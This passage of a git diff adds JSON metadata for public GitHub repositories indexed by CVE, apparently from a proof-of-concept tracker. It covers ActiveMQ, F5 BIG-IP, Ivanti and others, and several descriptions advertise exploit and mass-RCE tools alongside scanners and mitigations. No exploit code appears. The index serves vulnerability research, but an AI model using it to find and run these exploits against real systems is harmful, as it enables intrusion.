+ "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725243332, + "name": "activemq-cve-2023-46604-duplicate", + "full_name": "tomasmussi-mulesoft\/activemq-cve-2023-46604-duplicate", + "owner": { + "login": "tomasmussi-mulesoft", + "id": 87021051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87021051?v=4", + "html_url": "https:\/\/github.com\/tomasmussi-mulesoft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tomasmussi-mulesoft\/activemq-cve-2023-46604-duplicate", + "description": "Repository to exploit CVE-2023-46604 reported for ActiveMQ", + "fork": false, + "created_at": "2023-11-29T18:30:02Z", + "updated_at": "2024-12-11T14:20:35Z", + "pushed_at": "2024-11-02T13:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728564712, + "name": "CVE-Lab", + "full_name": "dcm2406\/CVE-Lab", + "owner": { + "login": "dcm2406", + "id": 106772368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4", + "html_url": "https:\/\/github.com\/dcm2406", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcm2406\/CVE-Lab", + "description": "Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604", + "fork": false, + "created_at": "2023-12-07T08:02:53Z", + "updated_at": "2024-12-27T05:56:06Z", + "pushed_at": "2024-03-20T06:20:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729610758, + "name": "CVE-2023-46604", + "full_name": "mrpentst\/CVE-2023-46604", + "owner": { + "login": "mrpentst", + "id": 85231870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85231870?v=4", + "html_url": "https:\/\/github.com\/mrpentst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrpentst\/CVE-2023-46604", + "description": "Exploit for CVE-2023-46604", + "fork": false, + "created_at": "2023-12-09T19:19:03Z", + "updated_at": "2023-12-09T19:32:34Z", + "pushed_at": "2024-02-24T16:15:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732382912, + "name": "CVE-2023-46604", + "full_name": "dcm2406\/CVE-2023-46604", + "owner": { + "login": "dcm2406", + "id": 106772368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4", + "html_url": "https:\/\/github.com\/dcm2406", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcm2406\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2023-12-16T13:50:58Z", + "updated_at": "2023-12-16T13:54:55Z", + "pushed_at": "2023-12-21T12:00:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734983177, + "name": "Broker_ApacheMQ", + "full_name": "Mudoleto\/Broker_ApacheMQ", + "owner": { + "login": "Mudoleto", + "id": 106175454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106175454?v=4", + "html_url": "https:\/\/github.com\/Mudoleto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mudoleto\/Broker_ApacheMQ", + "description": "CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker", + "fork": false, + "created_at": "2023-12-23T08:41:01Z", + "updated_at": "2023-12-26T05:21:10Z", + "pushed_at": "2023-12-26T05:21:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740774996, + "name": "cve-2023-46604", + "full_name": "hh-hunter\/cve-2023-46604", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-01-09T03:18:19Z", + "updated_at": "2024-01-09T03:18:19Z", + "pushed_at": "2024-01-09T03:18:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757561414, + "name": "ExploitScript-CVE-2023-46604", + "full_name": "stegano5\/ExploitScript-CVE-2023-46604", + "owner": { + "login": "stegano5", + "id": 67293586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67293586?v=4", + "html_url": "https:\/\/github.com\/stegano5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stegano5\/ExploitScript-CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-02-14T18:39:49Z", + "updated_at": "2024-02-14T19:20:54Z", + "pushed_at": "2024-02-14T19:19:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767370814, + "name": "ActiveMQ-RCE-Exploit", + "full_name": "Arlenhiack\/ActiveMQ-RCE-Exploit", + "owner": { + "login": "Arlenhiack", + "id": 162281579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162281579?v=4", + "html_url": "https:\/\/github.com\/Arlenhiack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arlenhiack\/ActiveMQ-RCE-Exploit", + "description": "ActiveMQ RCE (CVE-2023-46604) 回显利用工具", + "fork": false, + "created_at": "2024-03-05T07:09:21Z", + "updated_at": "2024-11-01T02:03:26Z", + "pushed_at": "2024-09-13T05:35:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787933435, + "name": "cve-2023-46604", + "full_name": "vulncheck-oss\/cve-2023-46604", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-46604", + "description": "A go-exploit for Apache ActiveMQ CVE-2023-46604", + "fork": false, + "created_at": "2024-04-17T13:10:34Z", + "updated_at": "2024-10-30T15:47:10Z", + "pushed_at": "2025-01-03T16:59:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46604", + "go-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792301008, + "name": "activemq-rce-cve-2023-46604", + "full_name": "thinkycx\/activemq-rce-cve-2023-46604", + "owner": { + "login": "thinkycx", + "id": 13138128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13138128?v=4", + "html_url": "https:\/\/github.com\/thinkycx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinkycx\/activemq-rce-cve-2023-46604", + "description": "activemq-rce-cve-2023-46604", + "fork": false, + "created_at": "2024-04-26T11:42:57Z", + "updated_at": "2024-04-26T11:45:33Z", + "pushed_at": "2024-04-26T11:45:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807674683, + "name": "honeypot.rs", + "full_name": "mranv\/honeypot.rs", + "owner": { + "login": "mranv", + "id": 61981861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61981861?v=4", + "html_url": "https:\/\/github.com\/mranv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mranv\/honeypot.rs", + "description": " CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.", + "fork": false, + "created_at": "2024-05-29T14:56:41Z", + "updated_at": "2024-05-29T18:18:22Z", + "pushed_at": "2024-07-22T18:11:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808380814, + "name": "CVE-2023-46604", + "full_name": "pulentoski\/CVE-2023-46604", + "owner": { + "login": "pulentoski", + "id": 60004847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4", + "html_url": "https:\/\/github.com\/pulentoski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pulentoski\/CVE-2023-46604", + "description": "El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) ", + "fork": false, + "created_at": "2024-05-31T00:38:47Z", + "updated_at": "2024-05-31T02:30:52Z", + "pushed_at": "2024-05-31T02:29:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873364628, + "name": "CVE-2023-46604", + "full_name": "cuanh2333\/CVE-2023-46604", + "owner": { + "login": "cuanh2333", + "id": 152946968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152946968?v=4", + "html_url": "https:\/\/github.com\/cuanh2333", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cuanh2333\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2024-10-16T03:31:13Z", + "updated_at": "2024-12-15T08:21:50Z", + "pushed_at": "2024-12-15T08:21:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46615.json b/2023/CVE-2023-46615.json new file mode 100644 index 0000000000..422ea94836 --- /dev/null +++ b/2023/CVE-2023-46615.json @@ -0,0 +1,33 @@ +[ + { + "id": 725628979, + "name": "CVE-2023-46615", + "full_name": "RandomRobbieBF\/CVE-2023-46615", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46615", + "description": "KD Coming Soon <= 1.7 - Unauthenticated PHP Object Injection via cetitle", + "fork": false, + "created_at": "2023-11-30T14:46:21Z", + "updated_at": "2024-07-11T16:40:03Z", + "pushed_at": "2023-11-30T14:51:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46694.json b/2023/CVE-2023-46694.json new file mode 100644 index 0000000000..84d507c0f9 --- /dev/null +++ b/2023/CVE-2023-46694.json @@ -0,0 +1,33 @@ +[ + { + "id": 765655083, + "name": "CVE-2023-46694", + "full_name": "invisiblebyte\/CVE-2023-46694", + "owner": { + "login": "invisiblebyte", + "id": 42798162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42798162?v=4", + "html_url": "https:\/\/github.com\/invisiblebyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invisiblebyte\/CVE-2023-46694", + "description": "CVE-2023-46694 proof-of-concept", + "fork": false, + "created_at": "2024-03-01T11:00:19Z", + "updated_at": "2024-05-27T13:02:53Z", + "pushed_at": "2024-03-01T11:02:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46747.json b/2023/CVE-2023-46747.json new file mode 100644 index 0000000000..9b507b12c3 --- /dev/null +++ b/2023/CVE-2023-46747.json @@ -0,0 +1,287 @@ +[ + { + "id": 712777457, + "name": "CVE-2023-46747-Mass-RCE", + "full_name": "bijaysenihang\/CVE-2023-46747-Mass-RCE", + "owner": { + "login": "bijaysenihang", + "id": 89993432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89993432?v=4", + "html_url": "https:\/\/github.com\/bijaysenihang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bijaysenihang\/CVE-2023-46747-Mass-RCE", + "description": "CVE-2023-46747 (F5 BIG-IP) RCE", + "fork": false, + "created_at": "2023-11-01T07:05:18Z", + "updated_at": "2023-11-02T00:30:14Z", + "pushed_at": "2023-10-30T14:01:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 712827804, + "name": "CVE-2023-46747-RCE", + "full_name": "W01fh4cker\/CVE-2023-46747-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-46747-RCE", + "description": "exploit for f5-big-ip RCE cve-2023-46747", + "fork": false, + "created_at": "2023-11-01T09:31:05Z", + "updated_at": "2025-01-02T16:47:08Z", + "pushed_at": "2024-10-20T10:27:37Z", + "stargazers_count": 202, + "watchers_count": 202, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2023-46747", + "exploit", + "f5", + "redteam" + ], + "visibility": "public", + "forks": 46, + "watchers": 202, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 712913642, + "name": "CVE-2023-46747", + "full_name": "fu2x2000\/CVE-2023-46747", + "owner": { + "login": "fu2x2000", + "id": 34998869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34998869?v=4", + "html_url": "https:\/\/github.com\/fu2x2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fu2x2000\/CVE-2023-46747", + "description": "CVE-2023-46747 Criticle Auth Bypass", + "fork": false, + "created_at": "2023-11-01T13:16:13Z", + "updated_at": "2023-11-01T13:17:31Z", + "pushed_at": "2023-11-01T13:17:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 712959399, + "name": "Mitigate-CVE-2023-46747", + "full_name": "maniak-academy\/Mitigate-CVE-2023-46747", + "owner": { + "login": "maniak-academy", + "id": 80640505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80640505?v=4", + "html_url": "https:\/\/github.com\/maniak-academy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maniak-academy\/Mitigate-CVE-2023-46747", + "description": null, + "fork": false, + "created_at": "2023-11-01T14:57:20Z", + "updated_at": "2023-11-04T15:33:52Z", + "pushed_at": "2023-11-05T17:10:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 713000566, + "name": "CVE-2023-46747-POC", + "full_name": "y4v4z\/CVE-2023-46747-POC", + "owner": { + "login": "y4v4z", + "id": 149609226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149609226?v=4", + "html_url": "https:\/\/github.com\/y4v4z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y4v4z\/CVE-2023-46747-POC", + "description": null, + "fork": false, + "created_at": "2023-11-01T16:28:28Z", + "updated_at": "2023-11-01T16:28:29Z", + "pushed_at": "2023-11-01T16:30:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713485222, + "name": "test_cve-2023-46747", + "full_name": "nvansluis\/test_cve-2023-46747", + "owner": { + "login": "nvansluis", + "id": 42541546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42541546?v=4", + "html_url": "https:\/\/github.com\/nvansluis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nvansluis\/test_cve-2023-46747", + "description": null, + "fork": false, + "created_at": "2023-11-02T16:03:35Z", + "updated_at": "2024-04-30T00:33:25Z", + "pushed_at": "2023-11-02T16:10:16Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713900805, + "name": "CVE-2023-46747", + "full_name": "RevoltSecurities\/CVE-2023-46747", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-46747", + "description": "An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs", + "fork": false, + "created_at": "2023-11-03T13:31:11Z", + "updated_at": "2024-04-24T17:45:07Z", + "pushed_at": "2023-11-03T14:37:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 755942386, + "name": "cve-2023-46747", + "full_name": "vidura2\/cve-2023-46747", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/cve-2023-46747", + "description": null, + "fork": false, + "created_at": "2024-02-11T14:38:37Z", + "updated_at": "2024-12-07T16:12:40Z", + "pushed_at": "2024-12-07T16:12:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 772788309, + "name": "CVE-2023-46747-RCE", + "full_name": "rainbowhatrkn\/CVE-2023-46747-RCE", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-46747-RCE", + "description": "exploit for f5-big-ip RCE cve-2023-46747", + "fork": false, + "created_at": "2024-03-15T22:45:31Z", + "updated_at": "2024-03-15T22:45:32Z", + "pushed_at": "2024-03-15T22:45:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46805.json b/2023/CVE-2023-46805.json new file mode 100644 index 0000000000..45655c8a51 --- /dev/null +++ b/2023/CVE-2023-46805.json @@ -0,0 +1,259 @@ +[ + { + "id": 743237104, + "name": "CVE-2023-46805", + "full_name": "yoryio\/CVE-2023-46805", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-46805", + "description": "Scanner for CVE-2023-46805 - Ivanti Connect Secure", + "fork": false, + "created_at": "2024-01-14T18:30:11Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-07-23T16:01:11Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46805", + "cve-2024-21887", + "ivanti-connect-secure" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 743894339, + "name": "CVE-2023-46805", + "full_name": "cbeek-r7\/CVE-2023-46805", + "owner": { + "login": "cbeek-r7", + "id": 117099647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4", + "html_url": "https:\/\/github.com\/cbeek-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2023-46805", + "description": "Simple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices", + "fork": false, + "created_at": "2024-01-16T08:05:58Z", + "updated_at": "2024-04-12T10:31:35Z", + "pushed_at": "2024-01-19T09:02:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744186376, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887", + "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.", + "fork": false, + "created_at": "2024-01-16T19:40:59Z", + "updated_at": "2024-12-14T13:55:04Z", + "pushed_at": "2024-01-17T19:14:09Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745015590, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "raminkarimkhani1996", + "id": 26582031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4", + "html_url": "https:\/\/github.com\/raminkarimkhani1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.", + "fork": false, + "created_at": "2024-01-18T13:25:46Z", + "updated_at": "2024-12-31T18:42:04Z", + "pushed_at": "2024-03-23T14:52:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745284788, + "name": "Ivanti-Connect-Around-Scan", + "full_name": "seajaysec\/Ivanti-Connect-Around-Scan", + "owner": { + "login": "seajaysec", + "id": 7016191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4", + "html_url": "https:\/\/github.com\/seajaysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan", + "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.", + "fork": false, + "created_at": "2024-01-19T02:12:11Z", + "updated_at": "2024-04-05T07:44:30Z", + "pushed_at": "2024-02-03T01:59:49Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745287513, + "name": "CVE-2023-46805", + "full_name": "Chocapikk\/CVE-2023-46805", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-46805", + "description": "Ivanti Pulse Secure CVE-2023-46805 Scanner - Based on Assetnote's Research", + "fork": false, + "created_at": "2024-01-19T02:23:13Z", + "updated_at": "2024-12-25T19:19:03Z", + "pushed_at": "2024-01-19T03:17:13Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745384269, + "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped", + "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "owner": { + "login": "mickdec", + "id": 33021266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4", + "html_url": "https:\/\/github.com\/mickdec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "description": null, + "fork": false, + "created_at": "2024-01-19T08:11:31Z", + "updated_at": "2024-05-21T12:56:29Z", + "pushed_at": "2024-05-21T12:56:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748232137, + "name": "CVE-2023-46805", + "full_name": "w2xim3\/CVE-2023-46805", + "owner": { + "login": "w2xim3", + "id": 91914344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4", + "html_url": "https:\/\/github.com\/w2xim3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-46805", + "description": "CVE-2023-46805 Ivanti POC RCE - Ultra fast scanner.", + "fork": false, + "created_at": "2024-01-25T14:53:16Z", + "updated_at": "2024-01-31T02:24:37Z", + "pushed_at": "2024-01-25T18:04:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46805", + "ivanti", + "rce", + "scanner" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46813.json b/2023/CVE-2023-46813.json new file mode 100644 index 0000000000..64fd9bf29f --- /dev/null +++ b/2023/CVE-2023-46813.json @@ -0,0 +1,33 @@ +[ + { + "id": 646888960, + "name": "cve-2023-46813-poc", + "full_name": "Freax13\/cve-2023-46813-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + 